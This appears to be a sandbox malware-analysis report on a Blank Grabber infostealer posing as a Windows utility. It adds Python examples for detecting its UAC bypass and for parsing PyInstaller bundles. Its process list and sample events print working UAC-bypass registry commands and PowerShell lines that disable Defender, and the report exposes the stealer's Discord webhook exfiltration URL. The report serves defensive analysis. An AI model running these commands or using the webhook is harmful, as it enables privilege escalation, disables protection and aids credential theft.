Malware analysis SolaraV3.exe Malicious activity | ANY.RUN - Malware Sandbox Online (2024)

File name: SolaraV3.exe

Full analysis: https://app.any.run/tasks/0af5b7d0-ce94-41db-a356-02d0f662dd2d
Verdict: Malicious activity
Threats:

Blank Grabber is an infostealer written in Python. It is designed to steal a wide array of data, such as browser login credentials, crypto wallets, Telegram sessions, and Discord tokens. It is open-source malware: its code is available on GitHub and receives regular updates. The builder's simple interface lets even threat actors with basic skills deploy it and conduct attacks.


Analysis date: September 29, 2024, 23:59:00
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: uac, evasion, blankgrabber, discord, stealer, exfiltration, pyinstaller, susp-powershell, discordgrabber, generic, growtopia, ims-api, upx

Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5: 031A05DC463314DF4904B6AAB7ABB56D
SHA1: D98F758B0126CC2BBFC59D38B23F59EBC8E21C18
SHA256: (not present in this copy of the report)
SSDEEP: 98304:66CwbRk+yQq4ANCz0dz3MCF7mbEelmPuxKS1HmTdozujquT3Jb3n64AMXGYwcnDr:y7/V1ppxy27bT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • BlankGrabber has been detected

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Bypass User Account Control (Modify registry)

      • reg.exe (PID: 5244)
    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 4668)
    • Adds path to the Windows Defender exclusion list

      • SolaraV3.exe (PID: 2268)
      • cmd.exe (PID: 5212)
      • cmd.exe (PID: 1964)
    • Antivirus name has been found in the command line (generic signature)

      • cmd.exe (PID: 3916)
      • MpCmdRun.exe (PID: 8152)
    • Windows Defender preferences modified via 'Set-MpPreference'

      • cmd.exe (PID: 3916)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7248)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 3812)
    • GROWTOPIA has been detected (YARA)

      • SolaraV3.exe (PID: 2268)
    • DISCORDGRABBER has been detected (YARA)

      • SolaraV3.exe (PID: 2268)
    • BLANKGRABBER has been detected (SURICATA)

      • SolaraV3.exe (PID: 2268)
    • Stealers network behavior

      • SolaraV3.exe (PID: 2268)
    • Starts CMD.EXE for self-deleting

      • SolaraV3.exe (PID: 2268)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Uses WEVTUTIL.EXE to query events from a log or log file

      • cmd.exe (PID: 876)
      • cmd.exe (PID: 6540)
    • Starts a Microsoft application from unusual location

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6968)
      • cmd.exe (PID: 6544)
      • cmd.exe (PID: 7096)
    • The process drops C-runtime libraries

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Process drops python dynamic module

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Found strings related to reading or modifying Windows Defender settings

      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 2268)
    • Application launched itself

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • Starts CMD.EXE for commands execution

      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 2268)
    • Changes default file association

      • reg.exe (PID: 5244)
    • Executable content was dropped or overwritten

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
      • csc.exe (PID: 8188)
    • Get information on the list of running processes

      • SolaraV3.exe (PID: 2268)
      • cmd.exe (PID: 1308)
      • cmd.exe (PID: 4892)
      • cmd.exe (PID: 1656)
      • cmd.exe (PID: 4664)
    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 3916)
    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 3916)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3916)
      • cmd.exe (PID: 5212)
      • cmd.exe (PID: 1964)
      • cmd.exe (PID: 1460)
      • cmd.exe (PID: 3812)
      • cmd.exe (PID: 1224)
      • cmd.exe (PID: 7636)
      • cmd.exe (PID: 8028)
      • cmd.exe (PID: 7316)
    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 6984)
      • cmd.exe (PID: 876)
      • cmd.exe (PID: 6032)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 3372)
      • cmd.exe (PID: 3972)
      • cmd.exe (PID: 6232)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 1156)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1964)
      • cmd.exe (PID: 5212)
    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 532)
    • Starts application with an unusual extension

      • cmd.exe (PID: 2064)
      • cmd.exe (PID: 7660)
      • cmd.exe (PID: 7404)
      • cmd.exe (PID: 7776)
      • cmd.exe (PID: 8024)
      • cmd.exe (PID: 7908)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3812)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3812)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 4008)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 3812)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 8188)
    • Possible usage of Discord/Telegram API has been detected (YARA)

      • SolaraV3.exe (PID: 2268)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 7840)
    • The executable file from the user directory is run by the CMD process

      • rar.exe (PID: 4068)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 8008)
    • Checks for external IP

      • svchost.exe (PID: 2256)
      • SolaraV3.exe (PID: 2268)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 4560)
    • Hides command output

      • cmd.exe (PID: 4560)
  • INFO

    • Create files in a temporary directory

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Checks supported languages

      • SolaraV3.exe (PID: 3332)
      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Reads the computer name

      • SolaraV3.exe (PID: 2108)
      • SolaraV3.exe (PID: 6780)
    • The process uses the downloaded file

      • cmd.exe (PID: 1336)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 4668)
    • The Powershell gets current clipboard

      • powershell.exe (PID: 1156)
    • PyInstaller has been detected (YARA)

      • SolaraV3.exe (PID: 6780)
      • SolaraV3.exe (PID: 2268)
    • Displays MAC addresses of computer network adapters

      • getmac.exe (PID: 2932)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • SolaraV3.exe (PID: 2268)
    • UPX packer has been detected

      • SolaraV3.exe (PID: 2268)
    • Attempting to use instant messaging service

      • svchost.exe (PID: 2256)
      • SolaraV3.exe (PID: 2268)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report.

ims-api

(PID) Process: (2268) SolaraV3.exe

Discord-Webhook-Tokens (1): 1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc

Discord-Info-Links: 1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc
Get Webhook Info: https://discord.com/api/webhooks/1279610116131389570/5EodVOfV7vKlKvxe2bJjP_IcSs2v5gxj-zDOPmaY9-B6G1xf-_tEZBpZPg9Vt-BnvSXc

No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

ProductVersion: 10.0.19041.1
ProductName: Microsoft® Windows® Operating System
OriginalFileName: XCOPY.EXE
LegalCopyright: © Microsoft Corporation. All rights reserved.
InternalName: xcopy
FileVersion: 10.0.19041.1 (WinBuild.160101.0800)
FileDescription: Extended Copy Utility
CompanyName: Microsoft Corporation
CharacterSet: Unicode
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Windows NT 32-bit
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 10.0.19041.1
FileVersionNumber: 10.0.19041.1
Subsystem: Windows GUI
SubsystemVersion: 6
ImageVersion: -
OSVersion: 6
EntryPoint: 0xcdb0
UninitializedDataSize: -
InitializedDataSize: 94208
CodeSize: 172032
LinkerVersion: 14.4
PEType: PE32+
ImageFileCharacteristics: Executable, Large address aware
TimeStamp: 2024:09:17 12:22:38+00:00
MachineType: AMD AMD64

The version resource above (OriginalFileName XCOPY.EXE, FileDescription "Extended Copy Utility", CompanyName Microsoft Corporation, version 10.0.19041.1) matches the legitimate Windows xcopy.exe; PyInstaller embeds whatever version file the builder supplies, so these fields carry no trust. They are the reason the process list below labels SolaraV3.exe as a Microsoft "Extended Copy Utility". The link timestamp (2024-09-17) and the MD5/SHA1 above are the static facts to pivot on.

No data.

Total processes: 257 | Monitored processes: 140 | Malicious processes: 8 | Suspicious processes: 5


Process information

Columns in the original table: PID, CMD, Path, Indicators, Parent process (the Indicators column is empty for every entry shown here).

PID 2108 | Parent process: explorer.exe
CMD: "C:\Users\admin\Desktop\SolaraV3.exe"
Path: C:\Users\admin\Desktop\SolaraV3.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Extended Copy Utility | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\users\admin\desktop\solarav3.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\user32.dll, c:\windows\system32\win32u.dll, c:\windows\system32\gdi32.dll, c:\windows\system32\gdi32full.dll, c:\windows\system32\msvcp_win.dll

PID 3332 | Parent process: SolaraV3.exe
CMD: "C:\Users\admin\Desktop\SolaraV3.exe"
Path: C:\Users\admin\Desktop\SolaraV3.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Extended Copy Utility | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\users\admin\desktop\solarav3.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\user32.dll, c:\windows\system32\win32u.dll, c:\windows\system32\gdi32.dll, c:\windows\system32\gdi32full.dll, c:\windows\system32\msvcp_win.dll

PID 6544 | Parent process: SolaraV3.exe
CMD: C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f"
Path: C:\Windows\System32\cmd.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Windows Command Processor | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll

PID 6732 | Parent process: cmd.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Console Window Host | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID 5916 | Parent process: cmd.exe
CMD: reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f
Path: C:\Windows\System32\reg.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Registry Console Tool | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\reg.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll

PID 6968 | Parent process: SolaraV3.exe
CMD: C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
Path: C:\Windows\System32\cmd.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Windows Command Processor | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll

PID 3360 | Parent process: cmd.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Console Window Host | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID 5244 | Parent process: cmd.exe
CMD: reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
Path: C:\Windows\System32\reg.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Registry Console Tool | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\reg.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll

PID 876 | Parent process: SolaraV3.exe
CMD: C:\WINDOWS\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
Path: C:\Windows\System32\cmd.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Windows Command Processor | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\cmd.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\apphelp.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\sechost.dll

PID 400 | Parent process: cmd.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
User: admin | Integrity Level: MEDIUM | Exit code: (blank)
Company: Microsoft Corporation | Description: Console Window Host | Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

Total events: 60622 | Read events: 60610 | Write events: 8 | Delete events: 4

Modification events

(PID 5244) reg.exe | Key: HKEY_CLASSES_ROOT\ms-settings\shell\open\command | Operation: write | Name: DelegateExecute | Value: (empty)
(PID 4668) ComputerDefaults.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer | Operation: write | Name: SlowContextMenuEntries | Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID 4668) ComputerDefaults.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | Operation: write | Name: CachePrefix | Value: (empty)
(PID 4668) ComputerDefaults.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | Operation: write | Name: CachePrefix | Value: Cookie:
(PID 4668) ComputerDefaults.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | Operation: write | Name: CachePrefix | Value: Visited:
(PID 6592) reg.exe | Key: HKEY_CLASSES_ROOT\ms-settings\shell\open\command | Operation: delete key
(PID 6592) reg.exe | Key: HKEY_CLASSES_ROOT\ms-settings\shell\open | Operation: delete key
(PID 6592) reg.exe | Key: HKEY_CLASSES_ROOT\ms-settings\shell | Operation: delete key
(PID 6592) reg.exe | Key: HKEY_CLASSES_ROOT\ms-settings | Operation: delete key
(PID 2268) SolaraV3.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib | Operation: write | Name: 1280x720x32(BGR 0) | Value: 31,31,31,31

Reading the sequence: reg.exe (PID 5244) creates an empty DelegateExecute value under the per-user ms-settings protocol handler. The command line targets HKCU\Software\Classes; the monitor records the write under the merged HKEY_CLASSES_ROOT view, which is why the two paths differ. With DelegateExecute present but empty, the shell falls back to the handler's (default) command string, which the earlier reg add (PID 5916) set to the sample's own path. ComputerDefaults.exe is an auto-elevating Windows binary that opens the ms-settings: protocol, so launching it (PID 4668) runs SolaraV3.exe at high integrity without a consent prompt when the logged-on user is an administrator at the default UAC level. A later reg.exe (PID 6592) deletes the whole ms-settings key tree; that cleanup is only visible here, not in the process list. The DrawDib value is benign Video for Windows profiling noise, though it shows the process rendering a 1280x720 bitmap, consistent with the screenshot a stealer takes.
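The process list and modification events above contain the complete ms-settings/DelegateExecute UAC bypass (reg.exe writes the handler, ComputerDefaults.exe fires it), the Set-MpPreference/Add-MpPreference Defender tampering and the wevtutil query of the Defender operational log. The detector below is an added example written for this page; it is not ANY.RUN code and not part of Blank Grabber. It runs over constructed process-creation records with Sysmon Event ID 1 style fields: the reg.exe and wevtutil command lines are the ones printed in this report, while the two PowerShell lines, the ComputerDefaults.exe parent path and the benign control event are assumptions. It generalizes slightly beyond the page by also matching fodhelper.exe, which abuses the same ms-settings handler.

```python
"""Detect the UAC-bypass and Defender-tampering chain from process-creation
records (fields modeled on Sysmon Event ID 1).
Added example; not ANY.RUN code and not part of Blank Grabber."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent


# Registry key abused by the ms-settings (ComputerDefaults/fodhelper) UAC bypass.
MS_SETTINGS_CMD = re.compile(
    r"(?:hkcu|hkey_current_user)\\software\\classes\\ms-settings\\shell\\open\\command", re.I)
REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\b", re.I)
# Auto-elevated binaries that open the ms-settings: protocol. The report shows
# ComputerDefaults.exe; fodhelper.exe uses the same handler (added generalization).
UAC_TRIGGERS = {"computerdefaults.exe", "fodhelper.exe"}
# Set-/Add-MpPreference switches that weaken Defender: Disable* and Exclusion*.
DEFENDER_TAMPER = re.compile(
    r"(?:set|add)-mppreference\b.*?-(?:disable\w+|exclusion(?:path|process|extension))", re.I)
DEFENDER_LOG_QUERY = re.compile(
    r"wevtutil(?:\.exe)?\s+(?:qe|query-events)\s+\"?microsoft-windows-windows defender/operational", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_user_writable(path: str) -> bool:
    """Crude check: anything under a profile or temp directory is attacker-writable."""
    p = path.lower()
    return p.startswith("c:\\users\\") or "\\appdata\\" in p or "\\temp\\" in p


def analyze(events):
    """Return (pid, tag, detail) findings. The handler write must precede the
    auto-elevated launch for the chain to count as a completed bypass."""
    findings = []
    handler_staged = False
    for ev in events:
        cmd = ev.command_line
        if REG_ADD.search(cmd) and MS_SETTINGS_CMD.search(cmd):
            handler_staged = True
            findings.append((ev.pid, "uac_bypass_staging",
                             "ms-settings handler written under HKCU\\Software\\Classes"))
        if basename(ev.image) in UAC_TRIGGERS and is_user_writable(ev.parent_image):
            tag = "uac_bypass_trigger" if handler_staged else "uac_trigger_unstaged"
            findings.append((ev.pid, tag, f"{basename(ev.image)} launched by {ev.parent_image}"))
        if DEFENDER_TAMPER.search(cmd):
            findings.append((ev.pid, "defender_tamper", "Set-/Add-MpPreference weakens Defender"))
        if DEFENDER_LOG_QUERY.search(cmd):
            findings.append((ev.pid, "defender_log_recon", "reads the Defender operational log"))
    return findings


# Constructed sample events. Command lines for PIDs 6544, 5244 and 876 are the
# ones printed in the report; the PowerShell lines and all parent paths are
# assumptions (the report names the cmdlets but does not print those lines).
SAMPLE_EVENTS = [
    ProcEvent(6544, r"C:\Windows\System32\cmd.exe",
              r'C:\WINDOWS\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\admin\Desktop\SolaraV3.exe" /f"',
              r"C:\Users\admin\Desktop\SolaraV3.exe"),
    ProcEvent(5244, r"C:\Windows\System32\reg.exe",
              r'reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(4668, r"C:\Windows\System32\ComputerDefaults.exe",
              "ComputerDefaults.exe", r"C:\Users\admin\Desktop\SolaraV3.exe"),
    ProcEvent(3916, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"',
              r"C:\Users\admin\Desktop\SolaraV3.exe"),
    ProcEvent(1964, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath C:\Users\admin\AppData\Local\Temp"',
              r"C:\Users\admin\Desktop\SolaraV3.exe"),
    ProcEvent(876, r"C:\Windows\System32\cmd.exe",
              r'C:\WINDOWS\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"',
              r"C:\Users\admin\Desktop\SolaraV3.exe"),
    ProcEvent(9001, r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt",
              r"C:\Windows\explorer.exe"),  # benign control
]

if __name__ == "__main__":
    for pid, tag, detail in analyze(SAMPLE_EVENTS):
        print(f"{pid:>5}  {tag:<22} {detail}")
```

The staging/trigger split matters in practice: a reg add to the ms-settings handler is rare enough to alert on by itself, but requiring an auto-elevated binary to be launched from a user-writable parent afterwards is what separates the completed bypass from a stray registry write, and the order check is why a lone ComputerDefaults.exe launch is tagged differently.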

Executable files: 38 | Suspicious files: 16 | Text files: 56 | Unknown types: (not shown)

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_decimal.pyd | executable | B7012443C9C31FFD3AED70FE89AA82A0 | 3B92D5CA6268A5AD0E92E5E403C621C56B17933DEF9D8C31E69AB520C30930D9
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\VCRUNTIME140.dll | executable | BE8DBE2DC77EBE7F88F910C61AEC691A | 4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\select.pyd | executable | 33722C8CD45091D31AEF81D8A1B72FA8 | 366FCA0B27A34835129086C8CDE1E75C309849E37091DB4ADEDA1BE508F2EE12
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_ssl.pyd | executable | E33BF2BC6C19BF37C3CC8BAC6843D886 | E3532D3F8C5E54371F827B9E6D0FEE175AD0B2B17E25C26FDFB4EFD5126B7288
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_ctypes.pyd | executable | FA360B7044312E7404704E1A485876D2 | F06C3491438F6685938789C319731DDF64BA1DA02CD71F43AB8829AF0E3F4E2F
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_socket.pyd | executable | DA0DC29C413DFB5646D3D0818D875571 | C3365AD1FEE140B4246F06DE805422762358A782757B308F796E302FE0F5AAF8
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\python312.dll | executable | EB02B8268D6EA28DB0EA71BFE24B15D6 | 80222651A93099A906BE55044024D32E93B841C83554359D6E605D50D11E2E70
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\_queue.pyd | executable | 326E66D3CF98D0FA1DB2E4C9F1D73E31 | BF6A8C5872D995EDAB5918491FA8721E7D1B730F66C8404EE760C1E30CB1F40E
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\rar.exe | executable | 9C223575AE5B9544BC3D69AC6364F75E | 90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
2108 | SolaraV3.exe | C:\Users\admin\AppData\Local\Temp\_MEI21082\blank.aes | binary | A10E5E525212B9C2F73ED543991E8F4F | D44B86328D878BA031E9A9CDE119EC15674FEF1D2B65B2CB3E8ED82ABC05A8DC
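The `_MEI21082` drops above are what a PyInstaller onefile executable unpacks at startup: the interpreter (python312.dll), extension modules (*.pyd), the C runtime, a bundled rar.exe and the data file blank.aes, the name Blank Grabber uses for its encrypted stage. All of that can be enumerated statically from the PyInstaller archive appended to the EXE, without running the sample. The parser below is an added example, not ANY.RUN's or Blank Grabber's code; it implements PyInstaller's CArchive cookie and table-of-contents layout and runs here against a small archive constructed in the block (the entry names mirror the drop names, the contents are fake).

```python
"""Static triage of a PyInstaller onefile bundle: locate the CArchive cookie,
walk the table of contents and flag entries worth pulling out, without running
the sample. Added example; not ANY.RUN's or Blank Grabber's code. The format
constants follow PyInstaller's archive layout; the sample archive at the bottom
is constructed here for demonstration."""
import math
import struct
import zlib

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIII64s"   # magic, package length, TOC offset, TOC length, python version, python lib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)      # 88 bytes
TOC_HDR_FMT = "!iIIIBc"     # entry length, data offset, compressed length, uncompressed length, zlib flag, type code
TOC_HDR_SIZE = struct.calcsize(TOC_HDR_FMT)    # 18 bytes


def parse_pyinstaller(blob: bytes) -> dict:
    # rfind: the bootloader may contain the magic too; the real cookie is the last one.
    pos = blob.rfind(PYINST_MAGIC)
    if pos < 0:
        raise ValueError("no PyInstaller cookie found")
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack(COOKIE_FMT, blob[pos:pos + COOKIE_SIZE])
    archive_start = pos + COOKIE_SIZE - pkg_len    # tolerates trailing bytes such as an Authenticode signature
    toc = blob[archive_start + toc_off:archive_start + toc_off + toc_len]
    entries, i = [], 0
    while i < len(toc):
        elen, off, clen, ulen, flag, tcode = struct.unpack(TOC_HDR_FMT, toc[i:i + TOC_HDR_SIZE])
        name = toc[i + TOC_HDR_SIZE:i + elen].rstrip(b"\x00").decode("utf-8", "replace")
        entries.append({"name": name, "offset": off, "compressed": clen, "size": ulen,
                        "zlib": flag == 1, "type": tcode.decode()})
        i += elen
    major, minor = (pyver // 100, pyver % 100) if pyver >= 100 else (pyver // 10, pyver % 10)
    return {"python": f"{major}.{minor}", "pylib": pylib.rstrip(b"\x00").decode(),
            "archive_start": archive_start, "entries": entries}


def extract(blob: bytes, info: dict, entry: dict) -> bytes:
    start = info["archive_start"] + entry["offset"]
    data = blob[start:start + entry["compressed"]]
    return zlib.decompress(data) if entry["zlib"] else data


def entropy(data: bytes) -> float:
    n = len(data)
    counts = [data.count(bytes([b])) for b in range(256)]   # slow but fine for triage-sized blobs
    return -sum(c / n * math.log2(c / n) for c in counts if c) if n else 0.0


def triage(blob: bytes, info: dict):
    """Flag what an analyst pulls out first: the entry script, opaque high-entropy
    data (an encrypted payload such as blank.aes) and bundled third-party executables."""
    hits = []
    for e in info["entries"]:
        lname = e["name"].lower()
        if e["type"] == "s":
            hits.append((e["name"], "entry-point script: decompile this first"))
        elif e["type"] == "x" and entropy(extract(blob, info, e)) > 7.5:
            hits.append((e["name"], "high-entropy data file: likely encrypted payload"))
        elif e["type"] == "b" and lname.endswith(".exe") and not lname.startswith("python"):
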